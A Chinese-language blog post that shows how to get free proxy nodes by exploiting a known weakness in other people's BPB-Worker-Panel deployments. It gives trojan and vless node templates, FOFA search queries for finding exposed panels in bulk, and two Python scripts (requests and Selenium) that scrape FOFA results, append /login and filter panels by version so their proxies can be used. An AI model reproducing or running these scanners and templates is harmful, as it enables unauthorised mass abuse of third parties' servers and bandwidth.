描述

这个免费的代理节点主要是来自BPB-Worker-Panel 面板的漏洞利用,其实这个漏洞早就被爆出过,也有人也发布视频怎么堵漏洞,但在后期更新中,作者又加上了一个新漏洞,根据作者说明,漏了无所谓,这样就代表可以使用很多的节点,起飞喽。

准备工作

V2ray客户端:【下载地址
V2ray-Pro客户端:【下载地址

代码:

1
2
3
4
5
6
7
8
trojan节点:
trojan://bpb-trojan@visa.cn:443?security=tls&sni=这里填域名&type=ws&host=这里填域名&path=%2Ftr%3Fed%3D2560#BPB好人

vless节点:
vless://89b3cbba-e6ac-485a-9481-976a0415eab9@visa.cn:443?encryption=none&security=tls&sni=这里填域名&type=ws&host=这里填域名&path=%3Fed%3D2560#BPB好人

noTLS VLESS节点:
vless://89b3cbba-e6ac-485a-9481-976a0415eab9@visa.cn:80?encryption=none&security=none&type=ws&host=这里填域名&path=%3Fed%3D2560#BPB好人
  1. 批量免费获取BPB面板的后台地址:
    443端口:【点击获取

    443搜索关键词:icon_hash="-1354027319" && asn="13335" && port="443"

    80端口:【点击获取

    80搜索关键词:icon_hash="-1354027319" && asn="13335" && port="80"

    这样就可以获取到BPB-Worker-Panel面板的登录地址,在前面加上/login,就可以获取到BPB-Worker-Panel面板的登录后台,版本最低需要2.5.3以上,这样才可以导入使用节点。

  2. 打开使用科学上网的客户端,复制粘贴上面准备的代码。
    复制粘贴

  3. 选择刚才的代码,点击编辑,从1那里获取到的地址,粘贴到伪装域名(host)SNI中。

    如果使用的是80的端口,这里就不需要添加SNI,可以直接把传输层安全(TLS)改成none

    v2ray节点编辑

进阶

这里分享一个知名的零度搭建的python代码,直接获取可使用的网址。

  1. 安装一个python客户端,这里就不说明了,详情安装过程可自己查询。

  2. 安装需要的依赖库:

    1
    2
    pip install requests beautifulsoup4
    pip install selenium

    注:如果有出现安装失败的情况,可能是你的版本太低,可以使用以下的指令。

    1
    pip install selenium requests beautifulsoup4 packaging
  3. 把下面的代码另存为一个vpn.py文件。

    在终端执行python E:\Documents\index\py\vpn.py时,这里在个人保存的文件夹中执行,文件会保存在C:\Windows\System32文件夹中,这里就对代码进行了一点优化,和执行文件存在一个文件夹中,去除了文件中出现的htpps:///login

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    import os
    import requests
    from bs4 import BeautifulSoup
    from packaging import version

    # 获取当前目录路径
    CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))

    # 输出文件的完整路径
    OUTPUT_FILE_1 = os.path.join(CURRENT_DIR, "1.txt")
    OUTPUT_FILE_2 = os.path.join(CURRENT_DIR, "2.txt")
    OUTPUT_FILE_OK = os.path.join(CURRENT_DIR, "OK.txt")

    HEADERS = {
    "User-Agent": (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
    "AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/115.0.0.0 Safari/537.36"
    )
    }
    MIN_VERSION = version.parse("2.5.3") # 最低版本号


    def fetch_fofa_results():
    """抓取 FOFA 页面并提取结果地址"""
    try:
    print("Fetching FOFA results...")
    response = requests.get(
    "https://fofa.info/result? qbase64=aWNvbl9oYXNoPSItMTM1NDAyNzMxOSIgJiYgYXNuPSIxMzMzNSIgJiYgcG9ydD0iNDQzIg%3D%3D",
    timeout=10
    )
    response.raise_for_status()
    except requests.RequestException as e:
    print(f"Error fetching FOFA results: {e}")
    return []

    soup = BeautifulSoup(response.text, 'html.parser')
    results = [link['href'] for link in soup.find_all('a', href=True) if link['href'].startswith("https://")]
    print(f"Found {len(results)} URLs.")
    return results


    def strip_https_and_login(input_file, output_file):
    """移除 https:// 前缀和 /login 后缀"""
    try:
    with open(input_file, "r", encoding="utf-8") as infile, \
    open(output_file, "w", encoding="utf-8") as outfile:
    for line in infile:
    url = line.strip()
    # 去掉 https:// 和 /login
    if url.startswith("https://"):
    url = url[8:] # 去掉 https://
    if url.endswith("/login"):
    url = url[:-6] # 去掉 /login
    outfile.write(f"{url}\n")
    print(f"Processed URLs saved to {output_file}.")
    except IOError as e:
    print(f"Error processing file: {e}")


    def validate_bpb_version(input_file, output_file):
    """验证 BPB Panel 版本"""
    try:
    with open(input_file, "r", encoding="utf-8") as infile, \
    open(output_file, "w", encoding="utf-8") as outfile:
    for url in infile:
    url = url.strip()
    try:
    response = requests.get(f"https://{url}/login", headers=HEADERS, timeout=10)
    response.raise_for_status()

    raw_version = extract_version(response.text)
    if raw_version and version.parse(raw_version) > MIN_VERSION:
    print(f"[Valid] {url} (Version: {raw_version})")
    outfile.write(f"{url}\n")
    except Exception as e:
    print(f"[Error] Could not process {url}: {e}")
    print(f"Validated URLs saved to {output_file}.")
    except IOError as e:
    print(f"Error reading/writing file: {e}")


    def extract_version(html):
    """从 HTML 中提取版本号"""
    if "BPB Panel" in html:
    start_index = html.find("BPB Panel")
    version_start = html.find("2", start_index)
    version_end = version_start
    while version_end < len(html) and (html[version_end].isdigit() or html[version_end] == "."):
    version_end += 1
    return html[version_start:version_end]
    return None


    def main():
    # 步骤 1:抓取 FOFA 页面结果
    urls = fetch_fofa_results()
    if not urls:
    print("No URLs fetched. Exiting.")
    return

    with open(OUTPUT_FILE_1, "w", encoding="utf-8") as file:
    file.writelines(f"{url}\n" for url in urls)
    print(f"Fetched results saved to {OUTPUT_FILE_1}.")

    # 步骤 2:移除 https:// 和 /login
    strip_https_and_login(OUTPUT_FILE_1, OUTPUT_FILE_2)

    # 步骤 3:验证 BPB Panel 版本,符合条件的保存到 OK.txt
    validate_bpb_version(OUTPUT_FILE_2, OUTPUT_FILE_OK)


    if __name__ == "__main__":
    main()

分页获取

注:分页获取会被网站检测,请你谨慎使用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
import os
import requests
from selenium import webdriver
from selenium.webdriver.common.by import By
from packaging import version
import time
from bs4 import BeautifulSoup

# 动态获取脚本所在目录
BASE_DIR = os.path.dirname(os.path.abspath(__file__))

# 文件名定义,保存在脚本目录下
OUTPUT_FILE_1 = os.path.join(BASE_DIR, "1.txt")
OUTPUT_FILE_2 = os.path.join(BASE_DIR, "2.txt")
OUTPUT_FILE_OK = os.path.join(BASE_DIR, "OK.txt")

BASE_URL = "https://fofa.info/result?qbase64=aWNvbl9oYXNoPSItMTM1NDAyNzMxOSIgJiYgYXNuPSIxMzMzNSIgJiYgcG9ydD0iNDQzIg%3D%3D"
HEADERS = {
"User-Agent": (
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
)
}
MIN_VERSION = version.parse("2.5.3")


def init_browser():
"""初始化 Selenium 浏览器"""
options = webdriver.ChromeOptions()
options.add_argument("--headless") # 无头模式
options.add_argument("--disable-gpu")
options.add_argument("--no-sandbox")
options.add_argument("--disable-dev-shm-usage")
return webdriver.Chrome(options=options)


def fetch_fofa_results(start_page, end_page):
"""使用 Selenium 抓取 FOFA 页面并提取结果地址"""
print(f"抓取 FOFA 页面: 第 {start_page} 页到第 {end_page} 页...")
results = set()
driver = init_browser()

try:
for page in range(start_page, end_page + 1):
print(f"抓取第 {page} 页...")
driver.get(f"{BASE_URL}&page={page}")
time.sleep(2) # 等待页面加载

# 抓取链接
elements = driver.find_elements(By.CSS_SELECTOR, "a[href^='https://']")
for elem in elements:
url = elem.get_attribute("href")
results.add(url)

except Exception as e:
print(f"抓取页面时出错: {e}")
finally:
driver.quit()

print(f"总共提取到 {len(results)} 个地址")
return list(results)


def save_urls_to_file(urls, file_path):
"""保存 URL 列表到文件"""
try:
with open(file_path, "w", encoding="utf-8") as file:
file.writelines(f"{url}\n" for url in urls)
print(f"结果保存到 {file_path}")
except IOError as e:
print(f"文件保存失败: {e}")


def append_login_to_urls(input_file, output_file):
"""在 URL 后追加 /login"""
print(f"处理文件 {input_file}, 添加 /login...")
try:
with open(input_file, "r", encoding="utf-8") as infile, \
open(output_file, "w", encoding="utf-8") as outfile:
for line in infile:
url = line.strip()
outfile.write(f"{url}/login\n")
print(f"处理完成,结果保存到 {output_file}")
except IOError as e:
print(f"文件处理失败: {e}")


def validate_bpb_version(input_file, output_file):
"""检查 BPB Panel 版本号"""
print(f"检查 {input_file} 中的 BPB Panel 版本号...")
try:
with open(input_file, "r", encoding="utf-8") as infile, \
open(output_file, "w", encoding="utf-8") as outfile:
for line in infile:
url = line.strip()
try:
response = requests.get(url, headers=HEADERS, timeout=10)
if response.status_code == 200 and "BPB Panel" in response.text:
raw_version = extract_version(response.text)
if raw_version and version.parse(raw_version) > MIN_VERSION:
print(f"[符合条件] {url} (版本号: {raw_version})")
outfile.write(f"{url}\n")
except requests.RequestException as e:
print(f"[错误] 无法访问 {url}: {e}")
except IOError as e:
print(f"文件读取/写入失败: {e}")


def extract_version(html):
"""从 HTML 提取版本号"""
soup = BeautifulSoup(html, "html.parser")
panel_text = soup.find(text="BPB Panel")
if panel_text:
next_text = panel_text.find_next(text=True)
if next_text and next_text[0].isdigit():
return next_text.strip()
return None


def main():
# 配置分页
start_page = 1
end_page = 3

# 第一步: 抓取 FOFA 页面
urls = fetch_fofa_results(start_page, end_page)
if urls:
save_urls_to_file(urls, OUTPUT_FILE_1)

# 第二步: 添加 /login
append_login_to_urls(OUTPUT_FILE_1, OUTPUT_FILE_2)

# 第三步: 检查版本号
validate_bpb_version(OUTPUT_FILE_2, OUTPUT_FILE_OK)


if __name__ == "__main__":
main()